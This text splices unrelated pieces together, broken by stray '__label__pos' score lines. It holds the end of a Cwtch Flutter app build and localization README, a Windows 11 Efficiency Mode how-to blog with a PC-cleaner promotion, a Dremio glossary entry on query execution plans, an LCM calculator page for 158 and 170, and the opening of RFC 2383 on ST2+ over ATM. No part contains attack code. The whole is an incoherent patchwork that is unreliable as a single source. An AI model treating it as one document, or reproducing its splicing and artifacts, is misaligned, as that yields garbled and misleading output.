печатает
</div>
</div>
<div id="messgeAll"class="contText">
<div id="dialog">
</div>
</div>
<div class="textinter">
<input id="message" type="text" class="inp" placeholder="Введите сообщение ">
<input id="messClcik" value="ОК" class="butt" type="button">
</div>
</div>
var dialog = document.getElementById("dialog");
var mess = document.createElement('div');
var text = "Доброго времени. Чем могу помочь?";
var textNode = document.createTextNode(text);
setTimeout(function() {
mess.appendChild(textNode);
dialog.appendChild(mess);
dialog.className = "owner";
}, 4000);
var butonSend = document.getElementById("messClcik");
var messgeAll = document.getElementById("messgeAll");
butonSend.onclick = function() {
var theDiv = document.createElement('div');
var userMessage = document.getElementById("message");
if(userMessage.value != ''){
document.getElementById('ava').style="background:url('http://vamotkrytka.ru/_ph/80/2/15311132.gif');background-size:cover; "
document.getElementById('print').style= "display:block";
theDiv.innerHTML = userMessage.value;
theDiv.className = "user";
messgeAll.appendChild(theDiv);
setTimeout(function() {
var answear = "привет, У Володи Путина спроси, да ну нах.., как так?, я ушел, завтра пиши, дорого, еп те, по клавишам не попадаю, ты бухой?, иди проспись пьянь!";
var arr = answear.split(', ');
var rand = Math.floor(Math.random() * arr.length);
var newOwner = document.createElement('div');
newOwner.innerHTML = arr[rand];
newOwner.className = "owner";
messgeAll.appendChild(newOwner);
document.getElementById('ava').style="";
document.getElementById('print').style= "display:none";
}, 4000);
return true;
}else{
return false;
}
}
#test{
position:fixed;
width:230px;
height:300px;
border:5px solid #466991;
bottom:0;
right:5px;
border-radius:10px;
animation: show 2s 2s both ease-in-out;
overflow:hidden;
}
@keyframes show {
from {
height:0px;
}
to {
height:300px;
}
}
.avatar{
width:230px;
height:50px;
background:#466991;
color:#fff;
}
.ava{
padding-top:5px;
width:40px;
height:40px;
border-radius:50%;
background:url('http://a.deviantart.net/avatars/a/u/austin1297.jpg');
background-size:cover;
float:left;
margin-right:5px;
}
#print{
animation: printO 1s linear infinite;
font-size:12px;
padding:0;
display:none;
}
@keyframes printO {
from { background:#00FF11;}
to { background:#466991;}
}
.fio{
font-size:16px;
}
.thepost{
font-size:14px;
}
.closed{
}
.closed:before{
position:absolute;
content:"–";
font-weight:bold;
top:0;
right:5px;
font-size:25px;
cursor:pointer;
}
.contText{
position:relative;
height:225px;
word-wrap:break-word;
overflow:auto;
}
.dialog{
position:absolute;
bottom:0;
}
.owner,.user{
width:180px;
border-radius:10px;
padding:4px;
margin:2px 0;
}
.owner{
float:left;
background:#CEE7EC;
}
.user{
float:right;
background:#FFEEDE;
}
.textinter{
}
.inp{
float:left;
width:185px;
margin-left:1px;
border-radius:5px 0 0 5px;
}
.butt{
background:green;
border:solid 1px green;
border-radius:0 5px 5px 0;
color:#fff;
}
S
На сайте с 30.09.2016
Offline
469
#1
Делать запрос через таймаут.
Отпилю лишнее, прикручу нужное, выправлю кривое. Вытравлю вредителей.
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
|
__label__pos
| 0.997169 |
ZeroDivisionError: float division by zero in Python
avatar
Borislav Hadzhiev
Last updated: Apr 22, 2022
banner
Photo from Unsplash
ZeroDivisionError: float division by zero in Python #
The Python "ZeroDivisionError: float division by zero" occurs when we try to divide a floating-point number by 0. To solve the error, use an if statement to check if the number you are dividing by is not zero, or handle the error in a try/except block.
zerodivisionerror float division by zero
Here is an example of how the error occurs.
main.py
a = 15.0 b = 0 # ⛔️ ZeroDivisionError: float division by zero result = a / b
It's unclear what value is expected when we divide by 0, so Python throws an error.
When we divide a number by 0, the result tends towards infinity.
One way to solve the error is to check if the value we are dividing by is not 0.
main.py
a = 15.0 b = 0 if b != 0: result = a / b else: result = 0 print(result) # 👉️ 0
We check if the b variable doesn't store a 0 value and if it doesn't, we divide a by b.
Otherwise, we set the result variable to 0. Note that this could be any other value that suits your use case.
If setting the result variable to 0, if b is equal to 0 suits your use case, you can shorten this to a single line.
main.py
a = 15.0 b = 0 result = b and a / b print(result) # 👉️ 0
The expression x and y first evaluates x, and if x is falsy, its value is returned, otherwise, y is returned.
Since 0 is a falsy value, it gets returned if the b variable in the example stores a 0 value, otherwise the result of dividing a by b is returned.
Alternatively, you can use a try/except statement.
main.py
a = 15.0 b = 0 try: result = a / b except ZeroDivisionError: result = 0 print(result) # 👉️ 0
We try to divide a by b and if we get a ZeroDivisionError, the except block sets the result variable to 0.
The best way to solve the error is to figure out where the variable gets assigned a 0 and check whether that's the expected behavior.
Here are some common ways you might get a zero value unexpectedly.
main.py
print(int()) # 👉️ 0 print(int(0.9)) # 👉️ 0
Conclusion #
The Python "ZeroDivisionError: float division by zero" occurs when we try to divide a floating-point number by 0. To solve the error, use an if statement to check if the number you are dividing by is not zero, or handle the error in a try/except block.
I wrote a book in which I share everything I know about how to become a better, more efficient programmer.
book cover
You can use the search field on my Home Page to filter through all of my articles.
|
__label__pos
| 0.989717 |
Define and Discuss on Fundamental Identities - Assignment Point
Define and Discuss on Fundamental Identities
Subject: Mathematic | Topics: ,
Prime objective of this article is to Define and Discuss on Fundamental Identities. This article explain Fundamental Identities in Trigonometry point of view. Here explain Fundamental Identities with proper examples and graph. If an equation contains one or more variables and is valid for many replacement values of the variables for which both sides of the equation are defined, then the equation is known as an identity. The picture x 2 + 2 x = x(x + 2), for case in point, is an identity given it is valid for just about all replacement values of times (x).
Related Mathematic Paper:
|
__label__pos
| 0.999927 |
3
$\begingroup$
Let the linear mapping ${P} : \mathbb{V}\rightarrow \mathbb{V}$ where $\mathbb{V}$ is the space of all functions real valueted of real variable, namely x, we set the image under ${P}$ of a function f(x) to be $$(Pf)(x)= \frac{f(x) + f(-x)}{2},$$ what can i say about the image of $\mathbb{V}$ under ${P}$ ?
My initial hypothesis was that the direct image on the whole domain would be the set of all function but the odd functions, i proved if $\mathbb{V}$ is composed only by either odd function or even functions, but trying to be more general, stating $\mathbb{V}$ to be the set defined on the first paragraph i could not prove. Someone know a way to do this?
$\endgroup$
6
• $\begingroup$ i don't understand how the image can contain odd functions. If $g(x) = \frac{f(x)+f(-x)}{2}$ then $g(-x) = g(x)$ so the image contains only even functions. $\endgroup$
– gt6989b
Jun 7, 2016 at 15:07
• 1
$\begingroup$ You're not on a bad track. Any real function decomposes uniquely as sum of an odd and an even function. $\endgroup$
– Pedro
Jun 7, 2016 at 15:08
• $\begingroup$ @gt6989b i agree that the image can not contain odd function, but this set could also contain a function whose is neither odd nor even. $\endgroup$ Jun 7, 2016 at 16:20
• $\begingroup$ @PedroTamaroff there is a name for this statement? i mean where can i find more informations about this? $\endgroup$ Jun 7, 2016 at 16:21
• $\begingroup$ @YassinRany no it cannot... see Ashwin's answer $\endgroup$
– gt6989b
Jun 7, 2016 at 16:22
1 Answer 1
5
$\begingroup$
The image would be the set of all even functions. It's clear the image consists only of even functions because for every function $f(x)$, $\frac{f(x)+f(-x)}{2}$ is an even function. Also, the image consists of all even functions because if $g(x)$ is any even function, then $g(x)$ is in the preimage of $g(x)$. So $P$ is a map from the set of all functions onto the set of all even functions.
$\endgroup$
You must log in to answer this question.
Not the answer you're looking for? Browse other questions tagged .
|
__label__pos
| 0.960802 |
The Impact of Social Media on Modern Communication
Introduction Social media has profoundly transformed how we communicate, offering both opportunities and challenges. From staying connected with friends to sharing news and opinions, social media platforms have reshaped interpersonal communication in numerous ways.
Body Social media platforms such as Facebook, Twitter, and Instagram allow people to connect and share information instantly. These platforms facilitate communication across long distances, enabling users to maintain relationships with family and friends regardless of geographical barriers. Additionally, social media provides a space for individuals to express themselves and engage with diverse communities.
However, social media also presents challenges. The constant flow of information can lead to information overload and decreased attention spans. The prevalence of curated content and idealized portrayals of life can impact self-esteem and contribute to feelings of inadequacy. Furthermore, issues such as cyberbullying and privacy concerns are significant drawbacks of social media use.
To maximize the benefits of social media while mitigating its downsides, it is important to practice mindful usage. Set boundaries for social media use, such as limiting screen time and being selective about the content you consume. Engage with social media in a way that enhances your well-being and fosters positive connections.
Conclusion Social media has revolutionized modern communication, offering both advantages and challenges. By using social media mindfully and setting healthy boundaries, you can harness its benefits while minimizing its potential negative impacts on communication and well-being.
Check Also
The Benefits of Journaling for Personal Growth
Introduction Journaling is a powerful tool for personal growth and self-reflection. By regularly writing about …
Leave a Reply
Your email address will not be published. Required fields are marked *
|
__label__pos
| 0.969148 |
Vi siete imbattuti nel fastidioso errore “TypeError: Cannot Read Property ‘Map’ of Undefined” nella vostra applicazione React? Fare il debug di questo errore può essere complicato, ma non temete: abbiamo pensato a voi.
In questo articolo illustreremo le cause e le soluzioni più comuni per aiutarvi a risolvere questo errore. Che siate degli sviluppatori React esperti o alle prime armi, questa guida vi aiuterà a rimettere in sesto la vostra applicazione.
Quali sono le cause dell’errore “TypeError: Cannot Read Property ‘Map’ of Undefined”?
L’errore “TypeError: Cannot Read Property ‘Map’ of Undefined” si verifica di solito quando si cerca di accedere a una proprietà o a un metodo di un valore non definito nel codice React.
In parole povere, l’errore si verifica quando si cerca di mappare un valore non definito, come ad esempio un array che non è stato inizializzato o che non ha ancora ricevuto dati.
Nell’esempio che segue, state ottenendo elementi di todo da dati JSON Placeholder, ma il metodo map viene chiamato prima che i dati di una richiesta API siano arrivati.
import { useState, useEffect } from 'react';
function App() {
const [todos, setTodos] = useState();
useEffect(() => {
const getTodos = async () => {
const response = await fetch(
'https://jsonplaceholder.typicode.com/todos?_limit=5'
);
const data = await response.json();
setTodos(data);
};
getTodos();
}, []);
console.log(todos);
return (
<div>
{todos.map((todo) => (
<div key={todo.id}>
<h2>Item: {todo.title}</h2>
</div>
))}
</div>
);
}
export default App;
Il codice qui sopra lancerà il messaggio “TypeError: Cannot read properties of undefined (reading ‘map’)”:
Messaggio di errore TypeError: Cannot read properties of undefined (reading 'map')
Messaggio di errore TypeError: Cannot read properties of undefined (reading ‘map’)
Dovrete cercare un modo per far sapere a React che lo stato todos è un array anche prima che l’array venga popolato, oppure dovrete evitare che il metodo map venga eseguito fino a che la variabile stato todos non riceve i suoi dati dalla richiesta API.
Hai appena iniziato a lavorare con React o sei uno sviluppatore esperto? Risolvi questo errore e rimetti in carreggiata la tua app con questa guida 👇 Clicca per twittare
3 modi per risolvere il problema “TypeError: Cannot Read Property ‘Map’ of Undefined”
Ecco tre modi per risolvere l’errore “TypeError: Cannot Read Property ‘Map’ of Undefined” in React:
1. Inizializzare la variabile di stato con un array vuoto
2. Utilizzare gli operatori di confronto
3. Usare l’operatore di concatenamento opzionale (?.)
Analizziamo ciascuna di queste soluzioni e come possono aiutare a risolvere l’errore nel codice React.
1. Inizializzare la variabile di stato in un array vuoto
Una delle soluzioni dirette all’errore “TypeError: Cannot Read Property ‘Map’ of Undefined” è assicurarsi che la variabile array su cui si sta cercando di mappare sia definita.
È possibile inizializzare la variabile di stato su un array vuoto per impostazione predefinita, in modo da assicurarsi che la variabile esista sempre e che non venga lanciato un errore quando si cerca di mapparla.
Ad esempio, i seguenti sono due componenti simili: la variabile di stato del primo non è inizializzata su un array vuoto, mentre è inizializzata nel secondo:
// Before initializing your state variable to an empty array
function MyComponent() {
const [myList, setMyList] = useState();
return (
<ul>
{myList.map(item => <li>{item}</li>)}
</ul>
);
}
// After initializing your state variable to an empty array
function MyComponent() {
const [myList, setMyList] = useState([]);
return (
<ul>
{myList.map(item => <li>{item}</li>)}
</ul>
);
}
Nell’esempio precedente, la variabile di stato myList viene inizializzata di default su un array vuoto utilizzando useState([]). Questo assicura che anche se myList è inizialmente indefinito, sarà sempre un array e non lancerà il messaggio “TypeError: Cannot Read Property ‘Map’ of Undefined”.
Per l’esempio di fetch, potete anche inizializzare la variabile di stato todos a un array vuoto ([]):
import { useState, useEffect } from 'react';
function App() {
// Initialize the state to an empty array of todos.
const [todos, setTodos] = useState([]);
useEffect(() => {
const getTodos = async () => {
const response = await fetch(
'https://jsonplaceholder.typicode.com/todos?_limit=5'
);
const data = await response.json();
setTodos(data);
};
getTodos();
}, []);
console.log(todos);
return (
<div>
{todos.map((todo) => (
<div key={todo.id}>
<h2>Item: {todo.title}</h2>
</div>
))}
</div>
);
}
export default App;
2. Utilizzare gli operatori di confronto
Un’altra soluzione è quella di utilizzare gli operatori di confronto per verificare se la variabile dell’array è definita prima di eseguire la mappatura su di essa. A tale scopo è possibile utilizzare l’operatore ternario o logico AND (&&).
Ecco alcuni esempi di utilizzo dell’operatore ternario:
function MyComponent() {
const [myList, setMyList] = useState();
return (
<ul>
{myList ? myList.map(item => <li>{item}</li>) : null}
</ul>
);
}
In questo esempio, state verificando se la variabile dell’array myList è definita prima di provare a mapparla. Se myList non è definito, l’operatore ternario restituisce null e non viene visualizzato nulla. Se myList è definito, viene richiamata la funzione map e gli elementi dell’elenco vengono restituiti.
Questa operazione è simile all’utilizzo dell’operatore logico AND:
function MyComponent() {
const [myList, setMyList] = useState();
return (
<ul>
{myList && myList.map(item => <li>{item}</li>)}
</ul>
);
}
Con l’uso di operatori di confronto come l’operatore ternario, è possibile gestire il caricamento, in modo da visualizzare qualcos’altro sullo schermo mentre si conducono i dati dall’API:
import { useState, useEffect } from 'react';
function App() {
const [todos, setTodos] = useState();
useEffect(() => {
const getTodos = async () => {
const response = await fetch(
'https://jsonplaceholder.typicode.com/todos?_limit=5'
);
const data = await response.json();
setTodos(data);
};
getTodos();
}, []);
console.log(todos);
return (
<div>
{todos ? (
todos.map((todo) => (
<div key={todo.id}>
<h2>Item: {todo.title}</h2>
</div>
))
) : (
<h1>Loading...</h1>
)}
</div>
);
}
export default App;
3. Utilizzare l’operatore di concatenamento opzionale (?.)
È anche possibile utilizzare l’operatore di concatenamento opzionale (?.) introdotto in ES2020. Questo operatore permette di accedere in modo sicuro a proprietà o metodi, come il metodo map di un array, senza che venga lanciato un errore se l’array è indefinito.
Ecco un esempio di componente funzionale che utilizza l’operatore di concatenamento per controllare la variabile di stato myList:
function MyComponent() {
const [myList, setMyList] = useState();
return (
<div>
{myList?.map((item) => (
<p>{item}</p>
))}
</div>
);
}
Nell’esempio precedente, state utilizzando l’operatore di concatenamento opzionale per accedere alla variabile dell’array myList in modo sicuro. Se myList è indefinito, non verrà visualizzato nulla. Se myList è definito, verrà richiamato il metodo map e gli elementi dell’elenco verranno renderizzati.
Ti sei mai chiesto cosa provoca questo errore in React? Di solito si verifica quando si utilizza il metodo map su un valore non definito o nullo. Ecco una guida passo-passo su come risolverlo 💡 Clicca per twittare
Riepilogo
L’errore “TypeError: Cannot Read Property ‘Map’ of Undefined” può verificarsi in React quando si utilizza il metodo map su un valore non definito o nullo.
Abbiamo visto tre soluzioni per risolvere questo errore.. Tuttavia, l’uso degli operatori di confronto è la soluzione più versatile perché può gestire situazioni in cui l’API potrebbe inviare una risposta vuota o un valore nullo.
Inoltre, se non siete sicuri che i dati ricevuti siano un array, potete aggiungere alcuni metodi per verificare e convertire il tipo di dati prima di chiamare il metodo map.
Scoprite l’Hosting di Applicazioni di Kinsta e iniziate il vostro prossimo progetto React oggi stesso!
Ora tocca a voi: avete mai riscontrato questo problema? Come l’avete risolto? Ci sono altri approcci che avete utilizzato e che non sono stati trattati in questo articolo? Fatecelo sapere nei commenti!
|
__label__pos
| 0.674015 |
Source code for libcloud.container.drivers.docker
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import datetime
import shlex
import re
try:
import simplejson as json
except:
import json
from libcloud.utils.py3 import httplib
from libcloud.utils.py3 import b
from libcloud.common.base import JsonResponse, ConnectionUserAndKey
from libcloud.common.types import InvalidCredsError
from libcloud.container.base import (Container, ContainerDriver,
ContainerImage)
from libcloud.container.providers import Provider
from libcloud.container.types import ContainerState
VALID_RESPONSE_CODES = [httplib.OK, httplib.ACCEPTED, httplib.CREATED,
httplib.NO_CONTENT]
[docs]class DockerResponse(JsonResponse): valid_response_codes = [httplib.OK, httplib.ACCEPTED, httplib.CREATED, httplib.NO_CONTENT]
[docs] def parse_body(self): if len(self.body) == 0 and not self.parse_zero_length_body: return self.body try: # error responses are tricky in Docker. Eg response could be # an error, but response status could still be 200 content_type = self.headers.get('content-type', 'application/json') if content_type == 'application/json' or content_type == '': if self.headers.get('transfer-encoding') == 'chunked': body = [json.loads(chunk) for chunk in self.body.strip().replace('\r', '').split('\n')] else: body = json.loads(self.body) else: body = self.body except ValueError: m = re.search('Error: (.+?)"', self.body) if m: error_msg = m.group(1) raise Exception(error_msg) else: raise Exception( 'ConnectionError: Failed to parse JSON response') return body
[docs] def parse_error(self): if self.status == 401: raise InvalidCredsError('Invalid credentials') return self.body
[docs] def success(self): return self.status in self.valid_response_codes
[docs]class DockerException(Exception): def __init__(self, code, message): self.code = code self.message = message self.args = (code, message) def __str__(self): return "%s %s" % (self.code, self.message) def __repr__(self): return "DockerException %s %s" % (self.code, self.message)
[docs]class DockerConnection(ConnectionUserAndKey): responseCls = DockerResponse timeout = 60
[docs] def add_default_headers(self, headers): """ Add parameters that are necessary for every request If user and password are specified, include a base http auth header """ headers['Content-Type'] = 'application/json' if self.user_id and self.key: user_b64 = base64.b64encode(b('%s:%s' % (self.user_id, self.key))) headers['Authorization'] = 'Basic %s' % (user_b64.decode('utf-8')) return headers
[docs]class DockerContainerDriver(ContainerDriver): """ Docker container driver class. >>> from libcloud.container.providers import get_driver >>> driver = get_driver('docker') >>> conn = driver(host='198.61.239.128', port=4243) >>> conn.list_containers() or connecting to http basic auth protected https host: >>> conn = driver('user', 'pass', host='https://198.61.239.128', port=443) connect with tls authentication, by providing a hostname, port, a private key file (.pem) and certificate (.pem) file >>> conn = driver(host='https://198.61.239.128', >>> port=4243, key_file='key.pem', cert_file='cert.pem') """ type = Provider.DOCKER name = 'Docker' website = 'http://docker.io' connectionCls = DockerConnection supports_clusters = False version = '1.24' def __init__(self, key=None, secret=None, secure=False, host='localhost', port=4243, key_file=None, cert_file=None): """ :param key: API key or username to used (required) :type key: ``str`` :param secret: Secret password to be used (required) :type secret: ``str`` :param secure: Whether to use HTTPS or HTTP. Note: Some providers only support HTTPS, and it is on by default. :type secure: ``bool`` :param host: Override hostname used for connections. :type host: ``str`` :param port: Override port used for connections. :type port: ``int`` :param key_file: Path to private key for TLS connection (optional) :type key_file: ``str`` :param cert_file: Path to public key for TLS connection (optional) :type cert_file: ``str`` :return: ``None`` """ super(DockerContainerDriver, self).__init__(key=key, secret=secret, secure=secure, host=host, port=port, key_file=key_file, cert_file=cert_file) if host.startswith('https://'): secure = True # strip the prefix prefixes = ['http://', 'https://'] for prefix in prefixes: if host.startswith(prefix): host = host.strip(prefix) if key_file or cert_file: # docker tls authentication- # https://docs.docker.com/articles/https/ # We pass two files, a key_file with the # private key and cert_file with the certificate # libcloud will handle them through LibcloudHTTPSConnection if not (key_file and cert_file): raise Exception( 'Needs both private key file and ' 'certificate file for tls authentication') self.connection.key_file = key_file self.connection.cert_file = cert_file self.connection.secure = True else: self.connection.secure = secure self.connection.host = host self.connection.port = port
[docs] def install_image(self, path): """ Install a container image from a remote path. :param path: Path to the container image :type path: ``str`` :rtype: :class:`libcloud.container.base.ContainerImage` """ payload = { } data = json.dumps(payload) result = self.connection.request('/v%s/images/create?fromImage=%s' % (self.version, path), data=data, method='POST') if "errorDetail" in result.body: raise DockerException(None, result.body) image_id = None # the response is slightly different if the image is already present # and it's not downloaded. both messages below indicate that the image # is available for use to the daemon if re.search(r'Downloaded newer image', result.body) or \ re.search(r'"Status: Image is up to date', result.body): if re.search(r'sha256:(?P<id>[a-z0-9]{64})', result.body): image_id = re.findall(r'sha256:(?P<id>[a-z0-9]{64})', result.body)[-1] # if there is a failure message or if there is not an image id in the # response then throw an exception. if image_id is None: raise DockerException(None, 'failed to install image') image = ContainerImage( id=image_id, name=path, path=path, version=None, driver=self.connection.driver, extra={}) return image
[docs] def list_images(self): """ List the installed container images :rtype: ``list`` of :class:`libcloud.container.base.ContainerImage` """ result = self.connection.request('/v%s/images/json' % (self.version)).object images = [] for image in result: try: name = image.get('RepoTags')[0] except: name = image.get('Id') images.append(ContainerImage( id=image.get('Id'), name=name, path=name, version=None, driver=self.connection.driver, extra={ "created": image.get('Created'), "size": image.get('Size'), "virtual_size": image.get('VirtualSize'), }, )) return images
[docs] def list_containers(self, image=None, all=True): """ List the deployed container images :param image: Filter to containers with a certain image :type image: :class:`libcloud.container.base.ContainerImage` :param all: Show all container (including stopped ones) :type all: ``bool`` :rtype: ``list`` of :class:`libcloud.container.base.Container` """ if all: ex = '?all=1' else: ex = '' try: result = self.connection.request( "/v%s/containers/json%s" % (self.version, ex)).object except Exception as exc: errno = getattr(exc, 'errno', None) if errno == 111: raise DockerException( errno, 'Make sure docker host is accessible' 'and the API port is correct') raise containers = [self._to_container(value) for value in result] return containers
[docs] def deploy_container(self, name, image, parameters=None, start=True, command=None, hostname=None, user='', stdin_open=True, tty=True, mem_limit=0, ports=None, environment=None, dns=None, volumes=None, volumes_from=None, network_disabled=False, entrypoint=None, cpu_shares=None, working_dir='', domainname=None, memswap_limit=0, port_bindings=None, network_mode='bridge', labels=None): """ Deploy an installed container image For details on the additional parameters see : http://bit.ly/1PjMVKV :param name: The name of the new container :type name: ``str`` :param image: The container image to deploy :type image: :class:`libcloud.container.base.ContainerImage` :param parameters: Container Image parameters :type parameters: ``str`` :param start: Start the container on deployment :type start: ``bool`` :rtype: :class:`Container` """ command = shlex.split(str(command)) if port_bindings is None: port_bindings = {} params = { 'name': name } payload = { 'Hostname': hostname, 'Domainname': domainname, 'ExposedPorts': ports, 'User': user, 'Tty': tty, 'OpenStdin': stdin_open, 'StdinOnce': False, 'Memory': mem_limit, 'AttachStdin': True, 'AttachStdout': True, 'AttachStderr': True, 'Env': environment, 'Cmd': command, 'Dns': dns, 'Image': image.name, 'Volumes': volumes, 'VolumesFrom': volumes_from, 'NetworkDisabled': network_disabled, 'Entrypoint': entrypoint, 'CpuShares': cpu_shares, 'WorkingDir': working_dir, 'MemorySwap': memswap_limit, 'PublishAllPorts': True, 'PortBindings': port_bindings, 'NetworkMode': network_mode, 'Labels': labels, } data = json.dumps(payload) try: result = self.connection.request('/v%s/containers/create' % (self.version), data=data, params=params, method='POST') except Exception as e: message = e.message or str(e) if message.startswith('No such image:'): raise DockerException(None, 'No such image: %s' % image.name) else: raise DockerException(None, e) id_ = result.object['Id'] payload = { 'Binds': [], 'PublishAllPorts': True, 'PortBindings': port_bindings, } data = json.dumps(payload) if start: result = self.connection.request( '/v%s/containers/%s/start' % (self.version, id_), data=data, method='POST') return self.get_container(id_)
[docs] def get_container(self, id): """ Get a container by ID :param id: The ID of the container to get :type id: ``str`` :rtype: :class:`libcloud.container.base.Container` """ result = self.connection.request("/v%s/containers/%s/json" % (self.version, id)).object return self._to_container(result)
[docs] def start_container(self, container): """ Start a container :param container: The container to be started :type container: :class:`libcloud.container.base.Container` :return: The container refreshed with current data :rtype: :class:`libcloud.container.base.Container` """ payload = { 'Binds': [], 'PublishAllPorts': True, } data = json.dumps(payload) result = self.connection.request( '/v%s/containers/%s/start' % (self.version, container.id), method='POST', data=data) if result.status in VALID_RESPONSE_CODES: return self.get_container(container.id) else: raise DockerException(result.status, 'failed to start container')
[docs] def stop_container(self, container): """ Stop a container :param container: The container to be stopped :type container: :class:`libcloud.container.base.Container` :return: The container refreshed with current data :rtype: :class:`libcloud.container.base.Container` """ result = self.connection.request('/v%s/containers/%s/stop' % (self.version, container.id), method='POST') if result.status in VALID_RESPONSE_CODES: return self.get_container(container.id) else: raise DockerException(result.status, 'failed to stop container')
[docs] def restart_container(self, container): """ Restart a container :param container: The container to be stopped :type container: :class:`libcloud.container.base.Container` :return: The container refreshed with current data :rtype: :class:`libcloud.container.base.Container` """ data = json.dumps({'t': 10}) # number of seconds to wait before killing the container result = self.connection.request('/v%s/containers/%s/restart' % (self.version, container.id), data=data, method='POST') if result.status in VALID_RESPONSE_CODES: return self.get_container(container.id) else: raise DockerException(result.status, 'failed to restart container')
[docs] def destroy_container(self, container): """ Remove a container :param container: The container to be destroyed :type container: :class:`libcloud.container.base.Container` :return: True if the destroy was successful, False otherwise. :rtype: ``bool`` """ result = self.connection.request('/v%s/containers/%s' % (self.version, container.id), method='DELETE') return result.status in VALID_RESPONSE_CODES
[docs] def ex_list_processes(self, container): """ List processes running inside a container :param container: The container to list processes for. :type container: :class:`libcloud.container.base.Container` :rtype: ``str`` """ result = self.connection.request("/v%s/containers/%s/top" % (self.version, container.id)).object return result
[docs] def ex_rename_container(self, container, name): """ Rename a container :param container: The container to be renamed :type container: :class:`libcloud.container.base.Container` :param name: The new name :type name: ``str`` :rtype: :class:`libcloud.container.base.Container` """ result = self.connection.request('/v%s/containers/%s/rename?name=%s' % (self.version, container.id, name), method='POST') if result.status in VALID_RESPONSE_CODES: return self.get_container(container.id)
[docs] def ex_get_logs(self, container, stream=False): """ Get container logs If stream == True, logs will be yielded as a stream From Api Version 1.11 and above we need a GET request to get the logs Logs are in different format of those of Version 1.10 and below :param container: The container to list logs for :type container: :class:`libcloud.container.base.Container` :param stream: Stream the output :type stream: ``bool`` :rtype: ``bool`` """ payload = {} data = json.dumps(payload) if float(self._get_api_version()) > 1.10: result = self.connection.request( "/v%s/containers/%s/logs?follow=%s&stdout=1&stderr=1" % (self.version, container.id, str(stream))).object logs = result else: result = self.connection.request( "/v%s/containers/%s/attach?logs=1&stream=%s&stdout=1&stderr=1" % (self.version, container.id, str(stream)), method='POST', data=data) logs = result.body return logs
[docs] def ex_search_images(self, term): """Search for an image on Docker.io. Returns a list of ContainerImage objects >>> images = conn.ex_search_images(term='mistio') >>> images [<ContainerImage: id=rolikeusch/docker-mistio...>, <ContainerImage: id=mist/mistio, name=mist/mistio, driver=Docker ...>] :param term: The search term :type term: ``str`` :rtype: ``list`` of :class:`libcloud.container.base.ContainerImage` """ term = term.replace(' ', '+') result = self.connection.request('/v%s/images/search?term=%s' % (self.version, term)).object images = [] for image in result: name = image.get('name') images.append( ContainerImage( id=name, path=name, version=None, name=name, driver=self.connection.driver, extra={ "description": image.get('description'), "is_official": image.get('is_official'), "is_trusted": image.get('is_trusted'), "star_count": image.get('star_count'), }, )) return images
[docs] def ex_delete_image(self, image): """ Remove image from the filesystem :param image: The image to remove :type image: :class:`libcloud.container.base.ContainerImage` :rtype: ``bool`` """ result = self.connection.request('/v%s/images/%s' % (self.version, image.name), method='DELETE') return result.status in VALID_RESPONSE_CODES
def _to_container(self, data): """ Convert container in Container instances """ try: name = data.get('Name').strip('/') except: try: name = data.get('Names')[0].strip('/') except: name = data.get('Id') state = data.get('State') if isinstance(state, dict): status = data.get( 'Status', state.get('Status') if state is not None else None) else: status = data.get('Status') if 'Exited' in status: state = ContainerState.STOPPED elif status.startswith('Up '): state = ContainerState.RUNNING else: state = ContainerState.STOPPED image = data.get('Image') ports = data.get('Ports', []) created = data.get('Created') if isinstance(created, float): created = ts_to_str(created) extra = { 'id': data.get('Id'), 'status': data.get('Status'), 'created': created, 'image': image, 'ports': ports, 'command': data.get('Command'), 'sizerw': data.get('SizeRw'), 'sizerootfs': data.get('SizeRootFs'), } ips = [] if ports is not None: for port in ports: if port.get('IP') is not None: ips.append(port.get('IP')) return Container( id=data['Id'], name=name, image=ContainerImage( id=data.get('ImageID', None), path=image, name=image, version=None, driver=self.connection.driver ), ip_addresses=ips, state=state, driver=self.connection.driver, extra=extra) def _get_api_version(self): """ Get the docker API version information """ result = self.connection.request('/version').object result = result or {} api_version = result.get('ApiVersion') return api_version
[docs]def ts_to_str(timestamp): """ Return a timestamp as a nicely formated datetime string. """ date = datetime.datetime.fromtimestamp(timestamp) date_string = date.strftime("%d/%m/%Y %H:%M %Z") return date_string
|
__label__pos
| 0.994902 |
cwtch-ui/README.md
127 lines
5.4 KiB
Markdown
# Cwtch UI
A Flutter based [Cwtch](https://cwtch.im) UI.
This README covers build instructions, for information on Cwtch itself please go to [https://cwtch.im](https://cwtch.im)
## Installing
- Android: Available from the Google Play Store (currently patrons only) or from [https://cwtch.im/download/](https://cwtch.im/download/) as an APK
- Windows: Available from [https://cwtch.im/download/](https://cwtch.im/download/) as an installer or .zip file
- Linux: Available from [https://cwtch.im/download/](https://cwtch.im/download/) as a .tar.gz
- `install.home.sh` installs the app into your home directory
- `install.sys.sh` as root to install system wide
- or run out of the unziped directory
- MacOS: Available from [https://cwtch.im/download/](https://cwtch.im/download/) as a .dmg
## Running
Cwtch processes the following environment variables:
- `CWTCH_HOME=` overrides the default storage path of `~/.cwtch` with what ever you choose
- `LOG_FILE=` will reroute all of libcwtch-go's logging to the specified file instead of the console
- `LOG_LEVEL=debug` will set the log level to debug instead of info
## Building
### Getting Started
First you will need a valid [flutter sdk installation](https://flutter.dev/docs/get-started/install).
You will probably want to disable Analytics on the Flutter Tool: `flutter config --no-analytics`
This project uses the flutter `stable` channel
Once flutter is set up, run `flutter pub get` from this project folder to fetch dependencies.
By default a development version is built, which loads profiles from `$CWTCH_HOME/dev/`. This is so that you can build
and test development builds with alternative profiles while running a release/stable version of Cwtch uninterrupted.
To build a release version and load normal profiles, use `build-release.sh X` instead of `flutter build X`
### Building on Linux (for Linux)
- copy `libCwtch-go.so` to `linux/`, or run `fetch-libcwtch-go.sh` to download it
- set `LD_LIBRARY_PATH="$PWD/linux"`
- copy a `tor` binary to `linux/` or run `fetch-tor.sh` to download one
- run `flutter config --enable-linux-desktop` if you've never done so before
- optional: launch cwtch-ui debug build by running `flutter run -d linux`
- to build cwtch-ui, run `flutter build linux`
